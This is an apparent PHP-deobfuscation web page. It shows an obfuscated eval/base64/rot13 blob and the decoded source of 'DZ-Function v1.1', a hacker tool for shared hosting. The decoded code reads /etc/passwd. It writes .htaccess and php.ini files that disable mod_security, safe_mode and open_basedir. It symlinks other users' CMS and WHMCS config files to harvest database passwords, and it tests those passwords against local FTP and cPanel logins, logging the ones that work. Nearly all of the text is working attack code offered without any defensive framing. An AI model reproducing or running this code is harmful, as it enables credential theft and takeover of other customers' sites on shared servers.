Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval (gzinflate(str_rot13(base64_decode("7T3ZZdtVks+tCP9QCa02yTZiHZZSRNG2jrYneVghyu2..

Decoded Output download

echo '<head>
<style type="text/css">
.style1 {
	text-align: center;
}
.style2 {
	margin-left: 0px;
}
.style3 {
	font-size: medium;
	color: #86FF00;
	font-family: "Gill Sans", "Gill Sans MT", Calibri, "Trebuchet MS", sans-serif;
}
.Style3 {
	font-family: "Gill Sans", "Gill Sans MT", Calibri, "Trebuchet MS", sans-serif;
	color: #000000;
}
.style4 {
	font-size: medium;
	color: #FFFFFF;
	font-family: "Gill Sans", "Gill Sans MT", Calibri, "Trebuchet MS", sans-serif;
}
.style8 {
	font-size: large;
	font-family: "Gill Sans", "Gill Sans MT", Calibri, "Trebuchet MS", sans-serif;
	color: #FF0000;
}
.style9 {
	text-decoration: underline;
}
.style10 {
	color: #FF0000;
	font-size: x-small;
}
.style11 {
	color: #6AFF00;
}
.style12 {
	color: #86FF00;
}
.style16 {
	text-decoration: none;
	color: #C8FF8C;
}
a {
	color: #00FF00;
}
.style18 {
	color: #C8FF8C;
}
.style17 {
	text-decoration: none;
	color: #86FF00;
}
.style19 {
	color: #FF0000;
	font-size: small;
}
.style20 {
	color: #FFFFFF;
}
.style21 {
	font-size: small;
}
.style22 {
	font-size: x-large;
	color: #B2B2B2;
	font-family: "Gill Sans", "Gill Sans MT", Calibri, "Trebuchet MS", sans-serif;
}
.style23 {
	font-size: small;
	color: #FF0000;
	font-family: "Gill Sans", "Gill Sans MT", Calibri, "Trebuchet MS", sans-serif;
}
</style>
</head>

 <body style="background-color: #000000">
 <title>DZ-Function v 1.1 ~ Hidden Pain</title>
<div class="style1">

	<form method="post">
		<strong><span class="style22">DZ-Function </span><span class="style23">v
		1.1</span></strong><br>
		<table align="center" style="width: 100%">
			<tr>
				<td class="style1" style="width: 50%; height: 605px;">
				<table style="width: 100%">
					<tr>
						<td class="style3" style="width: 35%" align="center">
						<br><span class="style11">
						-----------------------------------</span><select name="what" style="width: 167px">
						<option>Users ( Way 1 )</option>
						<option>Users ( Way 2 )</option>
						<option>Users ( Way 3 )</option>
						<option>/etc/passwd ( way 1 )</option>
						<option>/etc/passwd ( way 2 )</option>
						<option>/etc/passwd ( way 3 )</option>
						<option>/etc/passwd ( way 4 )</option>
						<option>Domain : User</option>
						</select><br><br>
		<input name="Get" style="width: 108px; height: 28px" type="submit" value="Drag"><br>
						<span class="style11">
						-----------------------------------</span><br>
						<span class="style19">Fill this Box by users First =&gt;</span><span class="style10"><br>
						</span><br>
						<input name="symlink" style="width: 108px; height: 28px" type="submit" value="Symlink Configs"><br>
						<span class="style11">
						-----------------------------------</span><br><br>
						<span class="style11">
						-----------------------------------<br></span>
						<span id="result_box3" class="style19" lang="en">
						<span class="hps">This</span> <span class="hps">will
						take some time</span></span><br>
						<select name="Cracko" style="width: 216px">
						<option>For /public_html/ Folders</option>
						<option>For All Server</option>
						</select><br><br>
						<input name="crack" style="width: 108px; height: 28px" type="submit" value="Randon Crack"><br><br>
						<span class="style20"><span class="style21">this feature allows
						to create some symlinks automatically &amp; collect some
						Password types</span><br>
						</span>
						<span class="style11">
						-----------------------------------</span></td>
						<td class="style1">
        				<span id="result_box" class="short_text" lang="en">
						<span class="style4"><strong>result :</strong></span></span><br>
<textarea name="users" rows=25 style="width: 100%" class="style3" >';

        set_time_limit(0);
        if($_POST['Get']){ do_get(); }
echo '</textarea></td></tr></table><br></td><td class="style3" align="center" style="height: 605px">';
info();
echo '<span class="style12">
				-----------------------------------------------------------------</span><br>
				<input name="bypass" type="submit" value="Bypass Using">&nbsp; <select class="style2" name="way" style="width: 180px">
				<option>.Htaccess</option>
				<option>Php.ini</option>
				<option>ini.php</option>
				<option>All Of them</option>
				</select><br>
				<span class="style11">------------------------------------------------------------------<br>
				Please be my <span id="result_box2" class="short_text" lang="en">
				<span class="hps">guest at<br><br>
                <a class="style16" href="http://www.facebook.com/hidden.pain" target="_blank">facebook.com</a></span></span></span><br class="style18">
				<span class="style17">
				<a class="style16" href="http://dz-geeks.blogspot.com/" target="_blank">dz-geeks.blogspot.com</a></span></span></span><br class="style18">
				<span class="style17">
				<a class="style16" href="http://www.aljyyosh.com/vb/" target="_blank">aljyyosh.com</a></span><br class="style18">
				<span class="style17">
				<a class="style16" href="http://dz4all.com/cc/" target="_blank">dz4all.com</a></span><br class="style18">
				<span class="style17">
				<a class="style16" href="http://www.sec4ever.com/" target="_blank">sec4ever.com</a></span><br><br>';
                gretz ();
                echo '</td>
			</tr>
		</table>
		<table align="center" bgcolor="#FFFFFF" bordercolor="#FF0000" bordercolordark="#FF0000" bordercolorlight="#FF0000" style="width: 100%">
			<tr>
				<td class="style1">
				<span id="result_box0" class="style8" lang="en">
				<span class="hps"><span class="style9">Status Box :</span><br>';

                if ($_POST['crack'])  {
                                             if ($_POST['Cracko']=="For /public_html/ Folders"){ do_crack ();}
                                             elseif ($_POST['Cracko']=="For All Server"){ do_crack_all ();     }
                   }
				if ($_POST['bypass']) { do_bypass();   }
                if ($_POST['symlink']){ do_symlinks(); }
////////////////////////---------->>>
set_time_limit(0);
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////################## functions ##################//////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
function info() {
  $dir = getcwd();
$uname= @php_uname();
if(strlen($dir)>1 && $dir[1]==":")
$os = "<Span style='color:red;'><strong>Windows</strong></span>";
else $os = "<Span style='color:green;'><strong>Linux</strong></span>";
$serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
if(ini_get('safe_mode')){
$safe_modes="<Span style='color:red;'><strong>On</strong></span>";
}else{
$safe_modes="<Span style='color:green;'><strong>Off</strong></span>";
}
echo "<center><span style='color: #FFFFFF;'>ID : <strong>".exec('id')."</strong></span><br/>";
echo "<center><span style='color: #FFFFFF;'>Server IP Address : <strong>".$serverIP."</strong> And System Is : </span>".$os."<br/>";
echo "<span style='color: #FFFFFF;'>Php Version : <strong>".phpversion()."</strong> | Safe Mode : ".$safe_modes."</span><br/>";
echo "<span style='color: #FFFFFF;'>My Location : $dir/</span> ";
if (eregi("public_html",$dir)) {
  echo "<Span style='color:green;'><strong>Cpanel Installed</strong></span><br />";
}
else {
  echo "<Span style='color:red;'><strong>Cpanel Not Installed</strong></span><br />";
};
echo "<span style='color: #FFFFFF;'>Operation System : ".$uname."</span><br/>";
echo "</center>";
}
function do_get(){
           if ($_POST['what']=="Users ( Way 1 )"){ $users = system('ls /var/mail');}
           elseif ($_POST['what']=="Users ( Way 2 )"){ $users = system('ls -al /etc/valiases');if (!$users){echo "[-]Sorry i can't bypass with this, maybe you have to turn Off Security Mode";}}
           elseif ($_POST['what']=="/etc/passwd ( way 1 )") { system('cat /etc/passwd'); }
           elseif ($_POST['what']=="/etc/passwd ( way 4 )") { system('cd /etc;cat passwd'); }
           elseif ($_POST['what']=="/etc/passwd ( way 3 )") { echo strip_tags(show_source ('/etc/passwd')); }
           elseif ($_POST['what']=="Users ( Way 3 )") {  system("awk -F: '{ print $1 }' /etc*/passwd | sort"); }
           elseif ($_POST['what']=="/etc/passwd ( way 2 )") { passwd2(); }
           elseif ($_POST['what']=="Domain : User") { domain_user(); }
}

function do_bypass(){
  if ($_POST['way']==".Htaccess"){ bypass_htaccess();}
elseif ($_POST['way']=="Php.ini") { bypass_php();}
elseif ($_POST['way']=="ini.php") { bypass_ini();}
else {
  bypass_htaccess();
  bypass_php();
  bypass_ini();
  ads();
}
}

function do_crack (){
  set_time_limit(0);
				    if(!file_exists("Cracked")) {
                 echo "<Span style='color:green;'>[+]Cracked Folder does not exist ,under Creating ...</span><br>";
                 mkdir("Cracked");
                 echo "<Span style='color:green;'>[+]Cracked Folder Created </span><br>";
                 chdir("Cracked");
                 sym_hta ();
                 }
                  else {
                    echo "<Span style='color:red;'>[-]Cracked Folder already Existing</span><br>";
                    chdir("Cracked");
                    sym_hta ();
                     }
				  @$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
   echo "[-] Error : coudn't read /etc/passwd";
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;

while(!feof($passwd)) {
  $str=fgets($passwd);
  if ($i>35) {
    $pos=strpos($str,":");
    $username=substr($str,0,$pos);
    $dirz="/home/$username/public_html/";
    if (($username!="")) {
        if (is_readable($dirz)) {
            array_push($users,$username);
            array_push($path_to_public,$dirz);
        }
    }
  }
  $i++;
}
				echo "<Span style='color:green;'>[+] Founded ".sizeof($users)." entrys in /etc/passwd<br>";
echo "[+] Founded ".sizeof($path_to_public)." readable public_html foldes<br>";

echo "[~] Searching for passwords in config.* files...<br><br>";
echo "[+] Ftp & Cpanel Engines Started<br><br></Span>";
ads();
foreach ($users as $user) {
        $path="/home/$user/public_html/";
        read_dir($path,$user);
}

echo "<Span style='color:green;'><br>[+] Done<br></Span>";
if(!file_exists("pass.txt")) {
                 echo "[-]No Passwords Matched Cpanel Or FTP Accounts<br>";
                 }
                  else {
                    echo "<Span style='color:green;'>[+]Cpanel Or FTP Passwords Founded =></span><a href='pass.txt'>Check them here</a><br>";
                     }
}

function do_crack_all (){
  set_time_limit(0);
				    if(!file_exists("Cracked")) {
                 echo "<Span style='color:green;'>[+]Cracked Folder does not exist ,under Creating ...</span><br>";
                 mkdir("Cracked");
                 echo "<Span style='color:green;'>[+]Cracked Folder Created </span><br>";
                 chdir("Cracked");
                 sym_hta ();
                 }
                  else {
                    echo "<Span style='color:red;'>[-]Cracked Folder already Existing</span><br>";
                    chdir("Cracked");
                    sym_hta ();
                     }
				  @$passwd=fopen('/etc/passwd','r');
if (!$passwd) {
   echo "[-] Error : Cant Start Task !!";
   ads();
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;

while(!feof($passwd)) {
  $str=fgets($passwd);
  if ($i>35) {
    $pos=strpos($str,":");
    $username=substr($str,0,$pos);
    $dirz="/";
    if (($username!="")) {
        if (is_readable($dirz)) {
            array_push($users,$username);
            array_push($path_to_public,$dirz);
        }
    }
  }
  $i++;
}
echo "<Span style='color:green;'>[+] Founded ".sizeof($path_to_public)." readable folders in server</Span><br>";
echo "<Span style='color:green;'>[!] This property may contain </Span>ROOT <Span style='color:green;'>Configs</Span><br>";
echo "<Span style='color:green;'>[~] Searching for passwords in config.* files...<br><br></Span>";
echo "<Span style='color:green;'>[+] Ftp & Cpanel Engines Started<br><br></Span>";
ads();
foreach ($users as $user) {
        $path="/";
        read_dir2($path,$user);
}

echo "<Span style='color:green;'><br>[+] Done<br></Span>";
if(!file_exists("pass.txt")) {
                 echo "[-]No Passwords Matched Cpanel Or FTP Accounts<br>";
                 }
                  else {
                    echo "<Span style='color:green;'>[+]Cpanel Or FTP Passwords Founded =></span><a href='pass.txt'>Check them here</a><br>";
                     }
}

function sym_hta (){
$htaccess=fopen(getcwd().$slash."/.htaccess","w");
fwrite($htaccess,"options all
Options +FollowSymLinks
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType text/plain .php
AddHandler server-parsed .php");
fclose($htaccess);
             }

function passwd2 (){
  for($uid=0;$uid<60000;$uid++){
               $ara = posix_getpwuid($uid);
               if (!empty($ara)) {
              while (list ($key, $val) = each($ara)){
             echo "$val:";
              }
           echo "
";
           }
           }
}



function domain_user() {
$domains = @file("/etc/named.conf");

if(!$domains){ die("[-] Couldn't Bypass it , Sorry"); }
foreach($domains as $domain){
if(eregi("zone",$domain)){
preg_match_all('#zone "(.*)"#', $domain, $domainsx);
flush();
if(strlen(trim($domainsx[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domainsx[1][0]));

echo $user['name']." : ".$domainsx[1][0]."
"; flush();

}}}
}
function bypass_htaccess() {
  $htaccess=fopen(getcwd().$slash."/.htaccess","w");
fwrite($htaccess,"Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
SetEnv PHPRC ".getcwd().$slash."/php.ini
suPHP_ConfigPath ".getcwd().$slash."/php.ini");
fclose($htaccess);
if(is_file(getcwd().$slash."/.htaccess")) { echo "<Span style='color:green;'><strong>.htaccess Created successfully</strong></span><br>"; } else { echo "<strong><Span style='color:red;'>I can not create .htaccess</strong></span><br>"; };
}
function bypass_php() {
  $php=fopen(getcwd().$slash."/php.ini","w");
fwrite($php,"safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF");
fclose($php);
if(is_file(getcwd().$slash."/php.ini")) { echo "<strong><Span style='color:green;'>php.ini Created successfully</strong></span><br>"; } else { echo "<strong><Span style='color:red;'>I can not create php.ini</strong></span><br>"; };
}
function bypass_ini() {
  $ini=fopen(getcwd().$slash."/ini.php","w");
fwrite($ini,'ini_restore("safe_mode");
ini_restore("open_basedir");');
fclose($ini);
if(is_file(getcwd().$slash."/ini.php")) { echo "<strong><Span style='color:green;'>ini.php Created successfully</strong></span><br>"; } else { echo "<strong><Span style='color:red;'>I can not create ini.php</strong></span><br>" ; };
}
function do_symlinks() {
  $sym_users = explode("
",$_POST['users']);
              if (empty($sym_users)) {echo "<strong><Span style='color:red;'>[-]users box is empty !!, please fill it and try again</span></strong><br>"; }
              elseif (eregi ("cpanel/bin/noshell",$sym_users)) {echo "<strong><Span style='color:red;'>[-]I cant extract users from /etc/passwd yet :( , Sorry</span></strong><br>";}
               else {
                 if(!file_exists("pain")) {
                 echo "<Span style='color:green;'>[+]pain Folder does not exist ,under Creating ...</span><br>";
                 mkdir("pain");
                 echo "<Span style='color:green;'>[+]pain Folder Created </span><br>";
                 chdir("pain");
                 }
                  else {
                    echo "<Span style='color:red;'>[-]pain Folder already Existing</span><br>";
                    chdir("pain");
                     }
             sym_hta ();
			 echo "<Span style='color:green;'>[+] Start Generating Symlinks ... please wait</span><br><br>";
			 ads();
  foreach ( $sym_users as $user )
               {

               if(!file_exists($user."~~vBulletin1.txt"))  { system("ln -s /home/$user/public_html/vb/includes/config.php $user~~vBulletin1.txt");   } else { }
               if(!file_exists($user."~~vBulletin2.txt"))  { system("ln -s /home/$user/public_html/includes/config.php $user.~~vBulletin2.txt");   } else { }
               if(!file_exists($user."~~vBulletin3.txt"))  { system("ln -s /home/$user/public_html/forum/includes/config.php $user~~vBulletin3.txt");   } else { }
               if(!file_exists($user."~~vBulletin4.txt"))  { system("ln -s /home/$user/public_html/cc/includes/config.php $user~~vBulletin4.txt");   } else { }
               if(!file_exists($user."~~Phpbb1.txt"))  { system("ln -s /home/$user/public_html/config.php $user~~Phpbb1.txt");   } else { }
               if(!file_exists($user."~~Phpbb2.txt"))  { system("ln -s /home/$user/public_html/forum/includes/config.php $user~~Phpbb2.txt");  } else { }
			   if(!file_exists($user."~~phpbb3.txt"))  { system("ln -s /home/$user./public_html/includes/functions.php $user~~phpbb3.txt");   } else { }
               if(!file_exists($user."~~Wordpress1.txt"))  { system("ln -s /home/$user/public_html/wp-config.php $user~~Wordpress1.txt");   } else { }
               if(!file_exists($user."~~Wordpress2.txt"))  { system("ln -s /home/$user/public_html/blog/wp-config.php $user~~Wordpress2.txt");   } else { }
               if(!file_exists($user."~~Joomla1.txt"))  { system("ln -s /home/$user/public_html/configuration.php $user~~Joomla1.txt");  } else { }
               if(!file_exists($user."~~Joomla2.txt"))  { system("ln -s /home/$user/public_html/blog/configuration.php $user~~Joomla2.txt");   } else { }
               if(!file_exists($user."~~Joomla3.txt"))  { system("ln -s /home/$user/public_html/joomla/configuration.php $user~~Joomla3.txt");     } else { }
               if(!file_exists($user."~~Whm1.txt"))  { system("ln -s /home/$user/public_html/whm/configuration.php $user~~Whm1.txt");   } else { }
               if(!file_exists($user."~~Whm2.txt"))  { system("ln -s /home/$user/public_html/whmc/configuration.php $user~~Whm2.txt");   } else { }
               if(!file_exists($user."~~Whm3.txt"))  { system("ln -s /home/$user/public_html/support/configuration.php $user~~Whm3.txt");    } else { }
               if(!file_exists($user."~~Whm4.txt"))  { system("ln -s /home/$user/public_html/client/configuration.php $user~~Whm4.txt");    } else { }
               if(!file_exists($user."~~Whm5.txt"))  { system("ln -s /home/$user/public_html/billings/configuration.php $user~~Whm5.txt");  } else { }
               if(!file_exists($user."~~Whm6.txt"))  { system("ln -s /home/$user/public_html/billing/configuration.php $user~~Whm6.txt");    } else { }
               if(!file_exists($user."~~Whm7.txt"))  { system("ln -s /home/$user/public_html/clients/configuration.php $user~~Whm7.txt");  } else { }
               if(!file_exists($user."~~Whm8.txt"))  { system("ln -s /home/$user/public_html/whmcs/configuration.php $user~~Whm8.txt");   } else { }
               if(!file_exists($user."~~Whm9.txt"))  { system("ln -s /home/$user/public_html/order/configuration.php $user~~Whm9.txt");   } else { }
               if(!file_exists($user."~~invisio.txt"))  { system("ln -s /home/$user/public_html/conf_global.php $user~~invisio.txt");    } else { }
			   if(!file_exists($user."~~Smf.txt"))  { system("ln -s /home/$user/public_html/settings.php $user~~Smf.txt");   } else { }
               if(!file_exists($user."~~infinity.txt"))  { system("ln -s /home/$user/public_html/include/db.php $user~~infinity.txt");   } else { }
               if(!file_exists($user."~~mk-portale1.txt"))  { system("ln -s /home/$user/public_html/mk_conf.php $user~~mk-portale1.txt");  } else { }
			   if(!file_exists($user."~~1.txt"))  { system("ln -s /home/$user/public_html/admin/conf.php $user~~1.txt");   } else { }
               if(!file_exists($user."~~2.txt"))  { system("ln -s /home/$user/public_html/admin/config.php $user~~2.txt");    } else { }
               if(!file_exists($user."~~3.txt"))  { system("ln -s /home/$user/public_html/include/db.php $user~~3.txt");   } else { }
               if(!file_exists($user."~~4.txt"))  { system("ln -s /home/$user/public_html/connect.php $user~~4.txt");   } else { }
               if(!file_exists($user."~~5.txt"))  { system("ln -s /home/$user/public_html/include/config.php $user~~5");    } else { }

               }}
               echo "<Span style='color:green;'>[+] All Symlinks Created Successfully</span><br><a href='pain'>Check them here</a><br>";
             }
function gretz (){
  $grets = array ("<Span style='color:green;'>E.v.e.l and Black Jaguar</Span>","<Span style='color:green;'>Viol3nt - Next Dream -  wookr</Span>","<Span style='color:green;'>Ev!LScR!pT_Dz and Dz-Black</Span>","<Span style='color:green;'>DZ-SEC Team & Dz4all.com</Span>","<Span style='color:green;'>Sec4ever crew and Lagripe-dz</Span>","<Span style='color:green;'>The Mask - chaMsou_23i - Over -X</Span>","<Span style='color:green;'>The Shodow and Ms_dz</Span>");
echo "<Span style='color:#FFFFFF;'>Greets to : </Span>".$grets[rand(0, 6)];
}
function ads() {
  echo '-----------------------------<br><div align="center">
<script type="text/javascript"><!--
google_ad_client = "pub-4206972615252597";
/* 300x250, created 5/24/11 */
google_ad_slot = "6363599603";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>';
	 echo '<script type="text/javascript"><!--
google_ad_client = "pub-4206972615252597";
/* 300x250,   31/05/11 */
google_ad_slot = "2064404874";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script><br>-----------------------------<br><br>';
}
function read_dir($path,$username) {
     set_time_limit(0);
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
              $fpath="$path$file";
              if (($file!='.') and ($file!='..')) {
                 if (is_readable($fpath)) {
                    $dr="$fpath/";
                    if (is_dir($dr)) {
                       read_dir($dr,$username);
                    }
                    else {
                         if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='configuration.php') or ($file=='db_connect.php') or ($file=='conf_global.php') or ($file=='connect.php') or ($file=='pass.php')) {
                            $pass=get_pass($fpath);
                            if ($pass!='') {
                               echo "<Span style='color:green;'>[+] $fpath founded !!</span><br>";
                               $curent =  $username."".rand(0,100)."~config.txt" ;
                               system("ln -s $fpath $curent");
                               echo "[+]Symlink Created<a href='Cracked/$curent'> => See it</a><br>";
                               ftp_check($username,$pass);
                               cpanel_check($host,$login,$pass,$timeout);  }  } } }  }  }}
                               }
function read_dir2($path,$username) {
     set_time_limit(0);
    if ($handle = opendir($path)) {
        while (false !== ($file = readdir($handle))) {
              $fpath="$path$file";
              if (($file!='.') and ($file!='..')) {
                 if (is_readable($fpath)) {
                    $dr="$fpath/";
                    if (is_dir($dr)) {
                       read_dir2($dr,$username);
                    }
                    else {
                         if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='configuration.php') or ($file=='db_connect.php') or ($file=='conf_global.php') or ($file=='connect.php') or ($file=='pass.php')) {
                            $pass=get_pass($fpath);
                            if ($pass!='') {
                               echo "<Span style='color:green;'>[+] $fpath founded !!</span><br>";
                               $curentn =  "Cracked-".rand(0,50000)."~config.txt" ;
                               system("ln -s $fpath $curentn");
                               echo "[+]Symlink Created<a href='Cracked/$curentn'> => See it</a><br>";
                               ftp_check($username,$pass);
                               cpanel_check($host,$login,$pass,$timeout);  }  } } }  }  }}
                               }

function get_pass($fpath) {
  set_time_limit(0);
    @$config=fopen($fpath,'r');
    while(!feof($config)) {
        $line=fgets($config);
        if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd') or strstr($line,'DB_PASSWORD') or strstr($line,'database_password')) {
            if (strrpos($line,'"'))
               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
            else
               $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
            return $pass;
        }
    }
}

function ftp_check($login,$pass) {
  set_time_limit(0);
     @$ftp=ftp_connect('127.0.0.1');
     if ($ftp) {
        @$res=ftp_login($ftp,$login,$pass);
        if ($res) {
           echo '[FTP] '.$login.':'.$pass."  Success<br>";
           $handle=fopen(getcwd().$slash."/pass.txt","a+");
           fwrite($handle, "[+] Ftp Login Found : ");
           fwrite($handle, $login);
           fwrite($handle, " : ");
           fwrite($handle, $pass);
           fwrite($handle, "
");
           fclose($handle);
        }
        else ftp_quit($ftp);
     }
}
function cpanel_check($host,$login,$pass,$timeout){
  set_time_limit(0);
$ch = curl_init();
$host ="127.0.0.1";
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$login:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) { }
elseif ( curl_errno($ch) == 0 ){
print "[+]Cracking Success With Username $login and Password $pass";
          $handle=fopen(getcwd().$slash."/pass.txt","a+");
           fwrite($handle, "[+] Cpanel Login Found at port 2082 : ");
           fwrite($handle, $login);
           fwrite($handle, " : ");
           fwrite($handle, $pass);
           fwrite($handle, "
");
           fclose($handle);
}
curl_close($ch);}
//////////////-----------------<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<<
//////////////-----------------<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<<
//////////////-----------------<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<<<<<


echo '</span></span></td></tr></table>
		</form>
 </div>
 <center><strong><h3><Span style="color:#FFFFFF;"><p>&lt; Coded By Hidden Pain &gt;</p></Span></h3></strong></center>

</body>

';

Did this file decode correctly?

Original Code

<?php eval (gzinflate(str_rot13(base64_decode("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